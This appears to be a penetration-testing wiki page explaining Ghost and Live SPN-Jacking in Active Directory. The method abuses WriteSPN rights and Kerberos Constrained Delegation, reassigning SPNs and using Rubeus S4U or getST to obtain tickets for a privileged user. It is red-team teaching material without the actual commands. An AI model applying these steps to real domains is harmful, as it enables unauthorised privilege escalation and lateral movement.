SPN Jacking
SPN Jacking is an alternative method to abuse WriteSPN rights as it manipulates Constrained Delegation to allow the abuse of WriteSPN when password cracking is not possible.
Ghost SPN-Jacking
Ghost SPN-Jacking targets scenarios where an SPN, previously associated with a computer or service account, is either no longer in use due to the deletion or renaming of the account, or it belongs to a custom service class that has been removed. Such SPNs are often left unattended in systems configured for Kerberos Constrained Delegation.
To enumerate WriteSPN rights we can use Bloodhound or PowerView. When using BloodHound we will see the edge WriteSPN.
It's good practice to confirm with powerview, pywerview, dacledit or adalanche since BH might miss this ACL
If we find an account with this ACL we need to confirm that machine account we own has constrained delegation set
And now to perform the Ghost SPN-Jacking attack we must look for orphaned SPNs on SRV, with the aim of assigning them to our target machine WEB. To do this we can use PowerView to search for servers configured for Constrained Delegation and to map which servers are configured along with Get-ConstrainedDelegation.ps1 to display the value of msDS-AllowedToDelegateTo as this attribute contains a list of SPNs and is used to configure a service so that it can obtain service tickets that can be used for Constrained Delegation - the script also allows to look for orphaned SPNs
After noting down the original state of the SPNs we can assign one of the orphaned SPNs to our target machine WEB
This action misaligns the SPN's intended association, tricking the Kerberos authentication system into recognizing WEB as the legitimate endpoint for the services initially tied to the SPN. Now we can use the S4U extension from Rubeus, using the SRV$ account to obtain a service ticket for a privileged user to WEB
The ticket obtained through executing Rubeus s4u wouldn't provide us access to WEB due to a discrepancy in the hostname and the service class dhcp/DATABASE doesn't provide an attack path, we need to change it to another service such as CIFS. That said, this ticket is encrypted for WEB, with the service name not encrypted within the ticket allowing us to alter the service name to one valid and the hostname to match the target WEB
Live SPN-Jacking
Live SPN-Jacking requires active manipulation of SPNs currently in use within the network environment.
Typically, in environments with up-to-date security updates in the Active Directory environment, only Domain Admins can assign the duplicate SPN to different accounts due to the potential for conflict. Attempting to assign an SPN already associated with DBSRV to WEB would usually be blocked by the Domain Controller to prevent such disputes. To get around this we need to remove the SPN we want to use from DBSRV, temporarily disabling the association and making it possible to add the SPN to WEB. As always, it's best practice to take note of the original state of the SPNs in order to revert the changes later on.
Now we can use powerview to remove the SPN from DBSRV
and assign it to WEB
This opens up the possibility for a S4U attack - it's still worth noting that the service name on the ticket wouldn't directly allow access to WEB, but we can alter the service name and host name to use the ticket against our target computer. We will use HTTP/WEB instead of CIFS to connect to PowerShell Remoting
After we have the ticket we can restore the SPNs we deleted
Performing this attack from linux requires some tunneling to be done - we can use chisel or ligolo for that
Then we can use findDelegation to verify if the computer we own has constrained delegation set and take note of the original state of the SPNs
Now we use krbrelayx's addspn to clear the SPNs from DBSRV
after this we add the SPN to WEB
and request a ticket
This getST command eliminates the need to use tgssub to change the hostname in the ticket
A really neat trick to restore a list of SPNs from a txt file is
Last updated